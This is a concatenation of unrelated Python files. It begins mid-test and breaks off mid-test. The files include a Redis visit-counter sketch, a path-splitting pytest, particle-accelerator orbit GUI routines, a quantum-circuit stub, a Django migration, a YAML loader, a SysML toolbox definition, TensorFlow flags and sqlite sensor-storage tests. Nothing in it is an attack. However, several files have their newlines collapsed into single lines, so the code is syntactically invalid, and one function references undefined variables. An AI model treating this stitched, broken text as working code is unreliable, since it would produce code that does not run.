        self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_INTERNAL_SERVER_ERROR)
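# The module under test (api.handlers) is not part of this file, so the tests
# above only pin down its observable behaviour.  A minimal sketch of a
# visits() handler that would satisfy them could look like the following; the
# key name "visits" and all names not exercised by the tests are assumptions.
import logging


class HttpHandlersSketch:
    HTTP_STATUS_OK = 200
    HTTP_STATUS_INTERNAL_SERVER_ERROR = 500
    redis_client = None  # injected (or mocked) before visits() is called

    @classmethod
    def visits(cls):
        try:
            raw = cls.redis_client.get("visits")       # None on first call, bytes afterwards
            count = int(raw) + 1 if raw is not None else 1
            cls.redis_client.mset({"visits": count})   # persist the incremented counter
            return {"visits": count}, cls.HTTP_STATUS_OK
        except Exception as exc:                       # also covers redis_client being None
            logging.error("visits handler failed: %s", exc)
            return {"error": str(exc)}, cls.HTTP_STATUS_INTERNAL_SERVER_ERROR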
import pytest

import anthpy.strings


@pytest.mark.parametrize("input_str,expected", [
    ("/path/to/file.txt", ["/path/to", "file", ".txt"]),
    ("file.txt", ["", "file", ".txt"]),
    ("/path/file", ["/path", "file", ""]),
    ("", ["", "", ""]),
])
def test_file_parts(input_str, expected):
    assert expected == anthpy.strings.file_parts(input_str)
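# anthpy.strings itself is not shown here.  Judging from the cases above,
# file_parts(path) splits a path into [directory, stem, extension]; a sketch
# that passes all four parametrized cases (the real implementation may differ):
import os


def file_parts(path):
    directory, basename = os.path.split(path)
    stem, ext = os.path.splitext(basename)
    return [directory, stem, ext]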
from __future__ import print_function, division, absolute_import """ Physics Routines for aporbit ============================ """ import numpy as np import aphla as ap from PyQt4.QtCore import QObject, Qt, QSettings, QSize, QThread, SIGNAL from PyQt4.QtGui import QApplication, QBrush, QMdiArea, QMessageBox, QPen, QDialog import PyQt4.Qwt5 as Qwt from elempickdlg import ElementPickDlg from orbitcorrdlg import OrbitCorrDlg from aporbitplot import ApMdiSubPlot from apbba import ApBbaDlg import cothread import time import logging _logger = logging.getLogger(__name__) def chooseElement(fam): elems = ap.getElements(fam) allelems = [(e.name, Qt.Checked) if e.isEnabled() else (e.name, Qt.Unchecked) for e in elems] enabled_0 = [i for i,e in enumerate(elems) if e.isEnabled()] extra_cols = [('s [m]', [e.sb for e in elems])] form = ElementPickDlg(allelems, title="Choose {0}".format(fam), extra_cols = extra_cols) if form.exec_(): enabled = form.checkedIndices() el0, el1 = [], [] for i,e in enumerate(elems): if i in enabled_0 and i not in enabled: el0.append(i) elif i not in enabled_0 and i in enabled: el1.append(i) if i in enabled: e.setEnabled(True) else: e.setEnabled(False) if el0: _logger.info("{0} {1} '{2}' are disabled".format( len(el0), fam, [elems[i].name for i in el0])) if el1: _logger.info("{0} {1} '{2}' are enabled".format( len(el1), fam, [elems[i].name for i in el1])) def openLocalBump(): """create local bump""" corbitdlg = OrbitCorrDlg( ap.getElements(wx.data.names()), s, x, y, xunit = xunit, yunit=yunit, stepsize = 200e-6, orbit_plots=(wx, wy), correct_orbit = self.correctOrbit) #corbitdlg.resize(600, 500) corbitdlg.setWindowTitle("Create Local Bump") corbitdlg.show() corbitdlg.raise_() corbitdlg.activateWindow() class ApOrbitPhysics: def __init__(self, mdiarea, **kwargs): self.mdiarea = mdiarea self.iqtApp = kwargs.get("iqt", None) self.deadelems = set() self.corbitdlg = None # orbit correction dlg self.bbadlg = None pass def close(self): if self.corbitdlg: self.corbitdlg.close() if self.bbadlg: self.bbadlg.close() def updateDeadElementPlots(self): for w in self.mdiarea.subWindowList(): for e in self.deadelems: if e.name not in w.data.names(): continue w.data.disable(e.name) def measBeta(self): p = ApMdiSubPlot(live=False) p.setAttribute(Qt.WA_DeleteOnClose) curves = [p.aplot.curve1, p.aplot.addCurve(), # x and xref p.aplot.addCurve(), p.aplot.addCurve() # y and yref ] for curv in curves: curv.setStyle(Qwt.QwtPlotCurve.Lines) curves[0].setPen(QPen(Qt.red, 1.3, Qt.DashLine)) curves[0].setZ(curves[1].z() + 2) curves[1].setPen(QPen(Qt.red, 1.5)) curves[2].setPen(QPen(Qt.blue, 1.3, Qt.DashLine)) curves[2].setZ(curves[3].z() + 2) curves[2].setSymbol(Qwt.QwtSymbol(Qwt.QwtSymbol.Triangle, QBrush(Qt.blue), QPen(Qt.black, 1), QSize(8, 8))) curves[3].setPen(QPen(Qt.blue, 1.5)) #p.aplot.curve1.setStyle(Qwt.QwtPlotCurve.) 
#p.setWindowTitle("[%s.%s] %s %s" % (mach, lat, title, fld)) self.mdiarea.addSubWindow(p) #print "Show" p.show() #plots.append(p) qs = ap.getGroupMembers(['C20', 'QUAD']) + \ ap.getGroupMembers(['C21', 'QUAD']) xl = min([q.sb for q in qs]) xr = max([q.se for q in qs]) s, btx, bty = [], [], [] try: betaref = ap.getBeta([q.name for q in qs], spos=True) curves[1].setData(betaref[:,-1], betaref[:,0], None) curves[3].setData(betaref[:,-1], betaref[:,1], None) fullmagprof = ap.machines.getLattice().getBeamlineProfile() magprof = [v for v in fullmagprof if max(v[0]) > xl \ and min(v[0]) < xr] p.aplot.setMagnetProfile(magprof) p.wid.autoScaleXY() p.aplot.replot() for q in qs[:3]: tbeta, tk1, tnu = ap.measBeta(q, full=True) #print tk1, tnu, tbeta QApplication.processEvents() s.append(tbeta[0,-1]) btx.append(tbeta[0,0]) bty.append(tbeta[0,1]) curves[0].setData(s, btx, None) curves[2].setData(s, bty, None) p.wid.autoScaleXY() p.aplot.replot() _logger.info("beta measured for {0} " \ "(s={1}, btx={2}, bty={3})".format( q.name, s[-1], btx[-1], bty[-1])) except: _logger.error("error at measBeta") raise _logger.info("finished beta measurement.") #if magprof: p.wid.setMagnetProfile(magprof) #self.connect(p, SIGNAL("destroyed()"), self.subPlotDestroyed) #print "update the plot" #p.updatePlot() # set the zoom stack #print "autozoom" #p.aplot.setErrorBar(self.error_bar) def measDispersion(self): p = ApMdiSubPlot(live=False) p.setAttribute(Qt.WA_DeleteOnClose) curves = [p.aplot.curve1, p.aplot.addCurve(), # x and xref p.aplot.addCurve(), p.aplot.addCurve() # y and yref ] for curv in curves: curv.setStyle(Qwt.QwtPlotCurve.Lines) curves[0].setPen(QPen(Qt.red, 1.3, Qt.DashLine)) curves[1].setPen(QPen(Qt.red, 1.5)) curves[2].setPen(QPen(Qt.blue, 1.3, Qt.DashLine)) curves[3].setPen(QPen(Qt.blue, 1.5)) curves[2].setSymbol(Qwt.QwtSymbol(Qwt.QwtSymbol.Triangle, QBrush(Qt.blue), QPen(Qt.black, 1), QSize(8, 8))) #p.aplot.curve1.setStyle(Qwt.QwtPlotCurve.) 
#p.setWindowTitle("[%s.%s] %s %s" % (mach, lat, title, fld)) self.mdiarea.addSubWindow(p) #print "Show" p.show() #plots.append(p) #bpms = ap.getGroupMembers(['C20', 'BPM']) + \ # ap.getGroupMembers(['C21', 'BPM']) bpms = ap.getElements('BPM') xl = min([q.sb for q in bpms]) xr = max([q.se for q in bpms]) s, btx, bty = [], [], [] try: etaref = ap.getEta([q.name for q in bpms], spos=True) curves[1].setData(etaref[:,-1], etaref[:,0], None) curves[3].setData(etaref[:,-1], etaref[:,1], None) fullmagprof = ap.machines.getLattice().getBeamlineProfile() magprof = [v for v in fullmagprof if max(v[0]) > xl \ and min(v[0]) < xr] p.aplot.setMagnetProfile(magprof) #p.wid.autoScaleXY() p.aplot.replot() disp = ap.measDispersion(bpms, verbose=2) curves[0].setData(disp[:,-1], disp[:,0], None) curves[2].setData(disp[:,-1], disp[:,1], None) p.wid.autoScaleXY() p.aplot.replot() _logger.info("dispersion eta measured") except: _logger.error("error at measEta") raise _logger.info("finished eta measurement.") #if magprof: p.wid.setMagnetProfile(magprof) #self.connect(p, SIGNAL("destroyed()"), self.subPlotDestroyed) #print "update the plot" #p.updatePlot() # set the zoom stack #print "autozoom" #p.aplot.setErrorBar(self.error_bar) def runBba(self, bpms): """create local bump""" inp = {'bpms': [], 'quads': [], 'cors': [], 'quad_dkicks': [], 'cor_dkicks': []} for bpm in bpms: inp['bpms'].extend([(bpm, 'x'), (bpm, 'y')]) quad = ap.getClosest(bpm, 'QUAD') inp['quads'].extend([(quad, 'k1'), (quad, 'k1')]) cor = ap.getNeighbors(bpm, 'HCOR', 1)[0] inp['cors'].append((cor, 'x')) cor = ap.getNeighbors(bpm, 'VCOR', 1)[0] inp['cors'].append((cor, 'y')) inp['quad_dkicks'].extend([1e-2, 1e-2]) inp['cor_dkicks'].extend([np.linspace(-6e-5, 6e-5, 4), np.linspace(-6e-5, 6e-5, 4)]) if self.bbadlg is None: #print self.obtdata.elem_names # assuming BPM has both x and y, the following s are same self.bbadlg = ApBbaDlg() self.bbadlg.resize(500, 200) self.bbadlg.setWindowTitle("Beam based alignment") #self.obtxplot.plotDesiredOrbit(self.orbitx_data.golden(), # self.orbitx_data.x) #self.obtyplot.plotDesiredOrbit(self.orbity_data.golden(), # self.orbity_data.x) self.bbadlg.show() self.bbadlg.raise_() self.bbadlg.activateWindow() from cothread.catools import caget, caput print(__file__, "BBA align", caget('V:2-SR:C30-BI:G2{PH1:11}SA:X')) self.bbadlg.runAlignment(**inp)
""" Contains the QuantumCircuit class boom. """ class QuantumCircuit(object): # pylint: disable=useless-object-inheritance """ Implements a quantum circuit. - - - WRITE DOCUMENTATION HERE - - - """ def __init__(self): """ Initialise a QuantumCircuit object """ pass def add_gate(self, gate): """ Add a gate to the circuit """ pass def run_circuit(self, register): """ Run the circuit on a given quantum register """ pass def __call__(self, register): """ Run the circuit on a given quantum register """ pass
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('music', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Song',
            fields=[
                ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),
                ('slug', models.SlugField(unique=True)),
                ('publish', models.BooleanField(default=False)),
                ('publish_on', models.DateTimeField(blank=True, null=True)),
                ('title', models.CharField(max_length=200)),
                ('description', models.TextField(blank=True)),
                ('credits', models.TextField(blank=True)),
                ('lyrics', models.TextField(blank=True)),
                ('track', models.PositiveIntegerField(blank=True, null=True)),
                ('release', models.ForeignKey(null=True, blank=True, to='music.Release')),
            ],
            options={
                'ordering': ['title'],
            },
            bases=(models.Model,),
        ),
    ]
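# For reference, the model that a migration like the one above would be
# generated from looks roughly like this (field names and options are taken
# from the migration itself; the project's actual models.py is not shown here):
from django.db import models


class Song(models.Model):
    slug = models.SlugField(unique=True)
    publish = models.BooleanField(default=False)
    publish_on = models.DateTimeField(blank=True, null=True)
    title = models.CharField(max_length=200)
    description = models.TextField(blank=True)
    credits = models.TextField(blank=True)
    lyrics = models.TextField(blank=True)
    track = models.PositiveIntegerField(blank=True, null=True)
    release = models.ForeignKey('music.Release', null=True, blank=True)

    class Meta:
        ordering = ['title']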
def exec_after_process(app, inp_data, out_data, param_dict, tool, stdout, stderr):
    # Post-job hook: tag the second sequence output with the dbkey chosen for it
    # in the tool parameters, then persist the change.
    for name, data in out_data.items():
        if name == "seq_file2":
            data.dbkey = param_dict['dbkey_2']
            app.model.context.add(data)
            app.model.context.flush()
            break
import yaml
from box import Box


def load_config(fp):
    """Read a YAML file and return its contents as an attribute-accessible Box."""
    # Use safe_load and a context manager: yaml.load without an explicit Loader
    # is deprecated, and the open file handle should not be leaked.
    with open(fp, 'r') as f:
        return Box(yaml.safe_load(f))
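# Example usage (the config file is written here just for the demonstration;
# Box allows attribute-style access on top of normal dict access):
if __name__ == "__main__":
    with open("example_config.yaml", "w") as f:
        f.write("database:\n  host: localhost\n  port: 5432\n")

    cfg = load_config("example_config.yaml")
    print(cfg.database.host)        # "localhost"
    print(cfg["database"]["port"])  # 5432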
"""The action definition for the SysML toolbox.""" from gaphas.item import SE import gaphor.SysML.diagramitems as sysml_items import gaphor.UML.diagramitems as uml_items from gaphor import UML, diagram from gaphor.core import gettext from gaphor.diagram.diagramtoolbox import ToolboxDefinition, ToolDef from gaphor.diagram.diagramtools import PlacementTool from gaphor.SysML import sysml def namespace_config(new_item): subject = new_item.subject diagram = new_item.canvas.diagram subject.package = diagram.namespace subject.name = f"New{type(subject).__name__}" def initial_pseudostate_config(new_item): new_item.subject.kind = "initial" def history_pseudostate_config(new_item): new_item.subject.kind = "shallowHistory" def metaclass_config(new_item): namespace_config(new_item) new_item.subject.name = "Class" # Actions: ((section (name, label, icon_name, shortcut)), ...) sysml_toolbox_actions: ToolboxDefinition = ( ( gettext("General"), ( ToolDef( "toolbox-pointer", gettext("Pointer"), "gaphor-pointer-symbolic", "Escape", item_factory=None, ), ToolDef( "toolbox-line", gettext("Line"), "gaphor-line-symbolic", "l", PlacementTool.new_item_factory(diagram.general.Line), ), ToolDef( "toolbox-box", gettext("Box"), "gaphor-box-symbolic", "b", PlacementTool.new_item_factory(diagram.general.Box), SE, ), ToolDef( "toolbox-ellipse", gettext("Ellipse"), "gaphor-ellipse-symbolic", "e", PlacementTool.new_item_factory(diagram.general.Ellipse), SE, ), ToolDef( "toolbox-comment", gettext("Comment"), "gaphor-comment-symbolic", "k", PlacementTool.new_item_factory( diagram.general.CommentItem, UML.Comment ), handle_index=SE, ), ToolDef( "toolbox-comment-line", gettext("Comment line"), "gaphor-comment-line-symbolic", "<Shift>K", PlacementTool.new_item_factory(diagram.general.CommentLineItem), ), ), ), ( gettext("Blocks"), ( ToolDef( "toolbox-block", gettext("Block"), "gaphor-class-symbolic", "b", item_factory=PlacementTool.new_item_factory( sysml_items.BlockItem, sysml.Block, config_func=namespace_config ), handle_index=SE, ), ToolDef( "toolbox-package", gettext("Package"), "gaphor-package-symbolic", "p", PlacementTool.new_item_factory( uml_items.PackageItem, UML.Package, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-association", gettext("Association"), "gaphor-association-symbolic", "<Shift>A", PlacementTool.new_item_factory(uml_items.AssociationItem), ), ToolDef( "toolbox-generalization", gettext("Generalization"), "gaphor-generalization-symbolic", "<Shift>G", PlacementTool.new_item_factory(uml_items.GeneralizationItem), ), ), ), ( gettext("Internal Blocks"), ( ToolDef( "toolbox-block", gettext("Block"), "gaphor-class-symbolic", "b", item_factory=PlacementTool.new_item_factory( sysml_items.BlockItem, sysml.Block, config_func=namespace_config ), handle_index=SE, ), ToolDef( "toolbox-package", gettext("Package"), "gaphor-package-symbolic", "p", PlacementTool.new_item_factory( uml_items.PackageItem, UML.Package, config_func=namespace_config, ), handle_index=SE, ), ), ), ( gettext("Requirements"), ( ToolDef( "toolbox-requirement", gettext("Requirement"), "gaphor-requirement-symbolic", "r", item_factory=PlacementTool.new_item_factory( sysml_items.RequirementItem, sysml.Requirement, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-satisfy-dependency", gettext("Satisfy"), "gaphor-satisfy-symbolic", "<Shift>I", PlacementTool.new_item_factory(sysml_items.SatisfyItem), ), ToolDef( "toolbox-derive-reqt-dependency", gettext("Derive Reqt"), "gaphor-derive-symbolic", "<Shift>D", 
PlacementTool.new_item_factory(sysml_items.DeriveReqtItem), ), ToolDef( "toolbox-trace-dependency", gettext("Trace"), "gaphor-trace-symbolic", "<Shift>C", PlacementTool.new_item_factory(sysml_items.TraceItem), ), ToolDef( "toolbox-refine-dependency", gettext("Refine"), "gaphor-refine-symbolic", "<Shift>N", PlacementTool.new_item_factory(sysml_items.RefineItem), ), ToolDef( "toolbox-verify-dependency", gettext("Verify"), "gaphor-verify-symbolic", "<Shift>V", PlacementTool.new_item_factory(sysml_items.VerifyItem), ), ), ), ( gettext("Actions"), ( ToolDef( "toolbox-action", gettext("Action"), "gaphor-action-symbolic", "a", item_factory=PlacementTool.new_item_factory( uml_items.ActionItem, UML.Action, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-initial-node", gettext("Initial node"), "gaphor-initial-node-symbolic", "j", item_factory=PlacementTool.new_item_factory( uml_items.InitialNodeItem, UML.InitialNode ), handle_index=SE, ), ToolDef( "toolbox-activity-final-node", gettext("Activity final node"), "gaphor-activity-final-node-symbolic", "f", item_factory=PlacementTool.new_item_factory( uml_items.ActivityFinalNodeItem, UML.ActivityFinalNode ), handle_index=SE, ), ToolDef( "toolbox-flow-final-node", gettext("Flow final node"), "gaphor-flow-final-node-symbolic", "w", item_factory=PlacementTool.new_item_factory( uml_items.FlowFinalNodeItem, UML.FlowFinalNode ), handle_index=SE, ), ToolDef( "toolbox-decision-node", gettext("Decision/merge node"), "gaphor-decision-node-symbolic", "g", item_factory=PlacementTool.new_item_factory( uml_items.DecisionNodeItem, UML.DecisionNode ), handle_index=SE, ), ToolDef( "toolbox-fork-node", gettext("Fork/join node"), "gaphor-fork-node-symbolic", "<Shift>R", item_factory=PlacementTool.new_item_factory( uml_items.ForkNodeItem, UML.JoinNode ), handle_index=1, ), ToolDef( "toolbox-object-node", gettext("Object node"), "gaphor-object-node-symbolic", "<Shift>O", item_factory=PlacementTool.new_item_factory( uml_items.ObjectNodeItem, UML.ObjectNode, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-partition", gettext("Partition"), "gaphor-partition-symbolic", "<Shift>P", item_factory=PlacementTool.new_item_factory(uml_items.PartitionItem), handle_index=SE, ), ToolDef( "toolbox-flow", gettext("Control/object flow"), "gaphor-control-flow-symbolic", "<Shift>F", item_factory=PlacementTool.new_item_factory(uml_items.FlowItem), ), ToolDef( "toolbox-send-signal-action", gettext("Send signal action"), "gaphor-send-signal-action-symbolic", None, item_factory=PlacementTool.new_item_factory( uml_items.SendSignalActionItem, UML.SendSignalAction, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-accept-event-action", gettext("Accept event action"), "gaphor-accept-event-action-symbolic", None, item_factory=PlacementTool.new_item_factory( uml_items.AcceptEventActionItem, UML.AcceptEventAction, config_func=namespace_config, ), handle_index=SE, ), ), ), ( gettext("States"), ( ToolDef( "toolbox-state", gettext("State"), "gaphor-state-symbolic", "s", item_factory=PlacementTool.new_item_factory( uml_items.StateItem, UML.State, config_func=namespace_config ), handle_index=SE, ), ToolDef( "toolbox-initial-pseudostate", gettext("Initial Pseudostate"), "gaphor-initial-pseudostate-symbolic", "<Shift>S", item_factory=PlacementTool.new_item_factory( uml_items.PseudostateItem, UML.Pseudostate, initial_pseudostate_config, ), handle_index=SE, ), ToolDef( "toolbox-final-state", gettext("Final State"), "gaphor-final-state-symbolic", 
"x", item_factory=PlacementTool.new_item_factory( uml_items.FinalStateItem, UML.FinalState ), handle_index=SE, ), ToolDef( "toolbox-history-pseudostate", gettext("History Pseudostate"), "gaphor-pseudostate-symbolic", "q", item_factory=PlacementTool.new_item_factory( uml_items.PseudostateItem, UML.Pseudostate, history_pseudostate_config, ), handle_index=SE, ), ToolDef( "toolbox-transition", gettext("Transition"), "gaphor-transition-symbolic", "<Shift>T", item_factory=PlacementTool.new_item_factory(uml_items.TransitionItem), ), ), ), ( gettext("Use Cases"), ( ToolDef( "toolbox-use-case", gettext("Use case"), "gaphor-use-case-symbolic", "u", item_factory=PlacementTool.new_item_factory( uml_items.UseCaseItem, UML.UseCase, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-actor", gettext("Actor"), "gaphor-actor-symbolic", "t", item_factory=PlacementTool.new_item_factory( uml_items.ActorItem, UML.Actor, config_func=namespace_config, ), handle_index=SE, ), ToolDef( "toolbox-use-case-association", gettext("Association"), "gaphor-association-symbolic", "<Shift>B", item_factory=PlacementTool.new_item_factory(uml_items.AssociationItem), ), ToolDef( "toolbox-include", gettext("Include"), "gaphor-include-symbolic", "<Shift>U", item_factory=PlacementTool.new_item_factory(uml_items.IncludeItem), ), ToolDef( "toolbox-extend", gettext("Extend"), "gaphor-extend-symbolic", "<Shift>X", item_factory=PlacementTool.new_item_factory(uml_items.ExtendItem), ), ), ), )
# coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Flag definition for the setup run-time options. Flag support needs to be defined outside of the parameter file as the parameter file get imported in the trainer main and flag definitions have to be in files imported prior to the start of main to be effective as command-line flags. """ from lingvo import compat as tf tf.flags.DEFINE_string("feature_neighborhood_train_path", None, "Required glob of training files.") tf.flags.DEFINE_string("feature_neighborhood_dev_path", None, "Required glob of dev files.") tf.flags.DEFINE_string("feature_neighborhood_test_path", None, "Required glob of test files.") tf.flags.DEFINE_string("input_symbols", None, "Required path to input_symbols.") tf.flags.DEFINE_string("output_symbols", None, "Required path to output_symbols.") tf.flags.DEFINE_float("learning_rate", 0.001, "Learning rate") tf.flags.DEFINE_boolean("append_eos", True, "Append </s> symbol.") tf.flags.DEFINE_integer("batch_size", 32, "Batch size.") tf.flags.DEFINE_integer("max_neighbors", 30, "Maximum number of neighbors.") tf.flags.DEFINE_integer("max_pronunciation_len", 40, "Maximum padded length of pronunciations.") tf.flags.DEFINE_integer("max_spelling_len", 20, "Maximum padded length of spellings.") tf.flags.DEFINE_boolean("neigh_use_tpu", False, "Is this model training on TPU?") tf.flags.DEFINE_boolean("split_output_on_space", False, "Do we split output tokens on space or by character?")
import unittest from luna.datatypes.dimensional import DataTimeSeries, DataTimePoint, PhysicalDataTimePoint, PhysicalDataTimeSlot, StreamingDataTimeSeries from luna.datatypes.dimensional import * from luna.common.exceptions import InputException, StorageException from luna.spacetime.time import dt, TimeSlotSpan from luna.datatypes.dimensional import TimePoint, Point, PhysicalData from luna.sensors import PhysicalDataTimeSensor from luna.storages.sqlite import sensor_storage, storage import json # TODO: this should be a generic storage test system, which should be then applied # to the various modules (that can be write or read only) #------------------------------------ # Logging #------------------------------------ # Enable only critical logging in unit tests by default logging.basicConfig(level=logging.CRITICAL) logger = logging.getLogger("luna") #------------------------------------ # Define demo sensor #------------------------------------ class VolumetricSensorV1(PhysicalDataTimeSensor): # Assign unique type_ID to this sensor type type_ID = 5 # Set Points expected lables Points_data_labels = ['flowrate_m3s'] # Set Slots operators Slots_data_labels = ['flowrate_m3s_AVG', 'flowrate_m3s_MIN', 'flowrate_m3s_MAX', 'volume_m3_TOT'] # Set validity region span for points Points_validity_region = TimeSlot(span='1m') # Fixed timezone: timezone = "Europe/Rome" #------------------------------------ # Sensor Storage Tests #------------------------------------ class test_sqlite_sensor_storage(unittest.TestCase): def setUp(self): pass def test_Init(self): _ = sensor_storage.DataTimeSeriesSQLiteStorage(in_memory=True) def test_PutGet_DataTimePoints(self): dataTimeSeriesSQLiteStorage = sensor_storage.DataTimeSeriesSQLiteStorage(in_memory=True) # Generate 10 points DataTimeSeries with flowrate sensor dataTimeSeries = DataTimeSeries() for i in range(10): data = PhysicalData( labels = ['flowrate_m3s'], values = [20.6+i] ) physicalDataTimePoint = PhysicalDataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries.append(physicalDataTimePoint) # Generate 10 points DataTimeSeries with light sensor dataTimeSeries_light = DataTimeSeries() for i in range(10): data = PhysicalData( labels = ['light_pct'], values = [60.6+i] ) physicalDataTimePoint = PhysicalDataTimePoint(t = 1436022000 + (i*60), tz="Europe/Rome", data=data) dataTimeSeries_light.append(physicalDataTimePoint) # Test put data without sensor (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test volumetric sensor volumetricSensorV1_1 = VolumetricSensorV1('lu65na') volumetricSensorV1_2 = VolumetricSensorV1('lu34na') # Test labels inconsistency with self.assertRaises(InputException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries_light, sensor=volumetricSensorV1_1) # Test put data with sensor and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1) # Test get with sensor and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, cached=True) # Test put data with sensor and right to create structure AND get with sensor and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! 
dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1, can_initialize=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, cached=True) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_2, cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) def test_PutGet_DataTimeSlots(self): dataTimeSeriesSQLiteStorage = sensor_storage.DataTimeSeriesSQLiteStorage(in_memory=True) # Generate 10 slots DataTimeSeries with flowrate sensor aggregated data dataTimeSeries = DataTimeSeries() for i in range(10): data = PhysicalData(labels = ['flowrate_m3s_AVG', 'flowrate_m3s_MIN', 'flowrate_m3s_MAX', 'volume_m3_TOT'], values = [20.6+i,20.6+i,20.6+i,20.6+i] ) physicalDataTimeSlot = PhysicalDataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data=data, span=TimeSlotSpan('60s')) dataTimeSeries.append(physicalDataTimeSlot) # Generate 10 points DataTimeSeries with light sensor aggregated data dataTimeSeries_light = DataTimeSeries() for i in range(10): data = PhysicalData(labels = ['light_pct_AVG'], values = [20.6+i] ) physicalDataTimeSlot = PhysicalDataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data=data, span=TimeSlotSpan('60s')) dataTimeSeries_light.append(physicalDataTimeSlot) # Test put data without sensor (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test volumetric sensor volumetricSensorV1_1 = VolumetricSensorV1('lu65na') volumetricSensorV1_2 = VolumetricSensorV1('lu34na') # Test labels inconsistency with self.assertRaises(InputException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries_light, sensor=volumetricSensorV1_1) # Test put data with sensor and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1) # Test get with sensor and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, timeSlotSpan=TimeSlotSpan('60s'), cached=True) # Test put data with sensor and right to create structure AND get with sensor and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! 
dataTimeSeriesSQLiteStorage.put(dataTimeSeries, sensor=volumetricSensorV1_1, can_initialize=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, timeSlotSpan=TimeSlotSpan('60s'), cached=True) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_2, timeSlotSpan=TimeSlotSpan('60s'), cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(sensor=volumetricSensorV1_1, timeSlotSpan=TimeSlotSpan('60s'), cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, timeSlotSpan = TimeSlotSpan('60s'), cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Also test that if we go trough the cached streaminTimeSeries again, we get the same result: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, timeSlotSpan = TimeSlotSpan('60s')) # Check that we can compare it as is even if it is not cached: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Check that we can compare it again: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get AGAIn the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get( sensor = volumetricSensorV1_1, from_dt = from_dt, to_dt = to_dt, timeSlotSpan = TimeSlotSpan('60s')) # But this time do not test any comparisons (that triggers the caching of the TimeSeries), # instead test that going trough it twice we achieve the same result (under the hood we go twice in the DB): 